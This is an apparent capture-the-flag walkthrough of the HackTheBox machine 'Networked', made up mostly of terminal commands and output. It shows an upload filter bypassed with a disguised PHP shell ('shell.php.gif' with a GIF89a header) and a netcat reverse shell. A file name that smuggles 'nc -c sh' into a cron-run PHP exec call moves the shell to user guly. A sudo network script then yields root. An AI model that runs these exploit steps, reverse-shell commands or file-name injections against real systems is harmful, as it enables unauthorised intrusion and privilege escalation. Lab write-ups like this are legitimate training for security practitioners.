NETWORKED (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.146
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-17 03:47 GMT
Nmap scan report for 10.10.10.146
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
443/tcp closed https
Aggressive OS guesses: Linux 3.10 – 4.11 (94%), HP P2000 G3 NAS device (91%), Linux 3.2 – 4.9 (91%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 – 4.6 (90%), Linux 4.10 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Asus RT-AC66U WAP (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 212.99 ms 10.10.14.1
2 213.15 ms 10.10.10.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.91 seconds

root@kali:~/Downloads# gobuster dir -u 10.10.10.146 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.146
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/17 03:59:42 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/backup (Status: 301)
/cgi-bin/ (Status: 403)
/index.php (Status: 200)
/uploads (Status: 301)
===============================================================
2019/11/17 04:01:27 Finished
===============================================================

root@kali:~/Downloads# gobuster dir -u 10.10.10.146 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.146
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/17 04:02:21 Starting gobuster
===============================================================
/index.php (Status: 200)
/.htaccess (Status: 403)
/. (Status: 200)
/upload.php (Status: 200)
/.html (Status: 403)
/photos.php (Status: 200)
[ERROR] 2019/11/17 04:03:07 [!] Get http://10.10.10.146/details.asp: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/finish.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/go.aspx: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/index_new.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:10 [!] Get http://10.10.10.146/frontpage.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/notify.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/jtl.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/list.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/msg.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2019/11/17 04:03:11 [!] Get http://10.10.10.146/invoice.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/.htpasswd (Status: 403)
[ERROR] 2019/11/17 04:03:17 [!] Get http://10.10.10.146/orderterms.html: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/.htm (Status: 403)
/.htpasswds (Status: 403)
/.htgroup (Status: 403)
/.htaccess.bak (Status: 403)
/lib.php (Status: 200)
/.htuser (Status: 403)
/.ht (Status: 403)
/.htc (Status: 403)
===============================================================
2019/11/17 04:09:22 Finished
===============================================================

Of note, running these commands found:

/uploads (Status: 301)
/upload.php (Status: 200)
/photos.php (Status: 200)

now try to access

http://10.10.10.146/upload.php

http://10.10.10.146/photos.php

root@kali:~/Downloads# cat shell.php

now upload the file and modify the filename

filename=”shell.php.gif”
Content-Type: image/gif

and top of the code add this

GIF89a;

and forward the request

file uploaded

now refresh the page

http://10.10.10.146/photos.php

and on terminal where we are listening we are getting the shell

root@kali:~/Downloads# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:47488.
Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:47:55 up 3:21, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$

sh-4.2$ pwd
/
pwd
sh-4.2$ cd /home/guly
cd /home/guly
sh-4.2$ ls -la
ls -la
total 28
drwxr-xr-x. 3 guly guly 171 Nov 17 04:29 .
drwxr-xr-x. 3 root root 18 Jul 2 13:27 ..
lrwxrwxrwx. 1 root root 9 Jul 2 13:35 .bash_history -> /dev/null
-rw-r–r–. 1 guly guly 18 Oct 30 2018 .bash_logout
-rw-r–r–. 1 guly guly 193 Oct 30 2018 .bash_profile
-rw-r–r–. 1 guly guly 231 Oct 30 2018 .bashrc
drwxrwxr-x 2 guly guly 29 Nov 17 04:32 .ssh
-rw——- 1 guly guly 639 Jul 9 13:40 .viminfo
-r–r–r–. 1 root root 782 Oct 30 2018 check_attack.php
-rw-r–r– 1 root root 44 Oct 30 2018 crontab.guly
-r——–. 1 guly guly 33 Oct 30 2018 user.txt

sh-4.2$ cat crontab.guly
cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php

sh-4.2$ cat /home/guly/check_attack.php
cat /home/guly/check_attack.php
$value) {
$msg=”;
if ($value == ‘index.html’) {
continue;
}
#echo “————-\n”;

#print “check: $value\n”;
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);

if (!($check[0])) {
echo “attack!\n”;
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

exec(“rm -f $logpath”);
exec(“nohup /bin/rm -f $path$value > /dev/null 2>&1 &”);
echo “rm -f $path$value\n”;
mail($to, $msg, $msg, $headers, “-F$value”);
}
}

?>

sh-4.2$ cd /var/www/html/uploads
cd /var/www/html/uploads
sh-4.2$ touch “test.txt”
touch “test.txt”

sh-4.2$ php /home/guly/check_attack.php
php /home/guly/check_attack.php
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection timed out.
rm -f /var/www/html/uploads/;nc -c bash 10.10.14.122 9001;.php
WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection refused.
rm -f /var/www/html/uploads/;nc -c bash 10.10.14.77 4444;

WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
Ncat: Connection timed out.
rm -f /var/www/html/uploads/;nc -c bash 10.10.15.147 4321

WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
/bin/rm: cannot remove ‘/var/www/html/uploads/’: Is a directory
rm -f /var/www/html/uploads/;nc -c bash 10.10.15.147 6666
WARNING: RunAsUser for MSP ignored, check group ids (egid=48, want=51)
can not chdir(/var/spool/clientmqueue/): Permission denied
Program mode requires special privileges, e.g., root or TrustedUser.
attack!
rm -f /var/www/html/uploads/dir
attack!
rm -f /var/www/html/uploads/test.txt

sh-4.2$ cat /etc/httpd/conf.d/php.conf
cat /etc/httpd/conf.d/php.conf
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
php_value session.save_handler “files”
php_value session.save_path “/var/lib/php/session”

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555

on previous shell

sh-4.2$ touch ‘fooo; nc -c sh 10.10.14.135 5555’
touch ‘fooo; nc -c sh 10.10.14.135 5555’

After waiting 3 minutes our netcat listener got a connection back with the user guly:

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.146.
Ncat: Connection from 10.10.10.146:51954.

id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
cat user.txt
526cfc2305f17XXXXXXXXXXXXXXXXXXXXXX

sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=”COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS”, env_keep+=”MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE”, env_keep+=”LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES”, env_keep+=”LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY”, secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh

The /usr/local/sbin/changename.sh script does the following:

cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp=”^[a-zA-Z0-9_\ /-]+$”

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo “interface $var:”
read x
while [[ ! $x =~ $regexp ]]; do
echo “wrong input, try again”
echo “interface $var:”
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

It basically asks us to fill out 4 variables, then writes a network interface configuration file and tries to bring up that device. By passing in xx sh as one of the variables we can get a root-shell:

sudo /usr/local/sbin/changename.sh

interface NAME:
xx sh

interface PROXY_METHOD:
x

interface BROWSER_ONLY:
x

interface BOOTPROTO:
x

id
uid=0(root) gid=0(root) groups=0(root)

cat /root/root.txt
0a8ecda83f1d812XXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT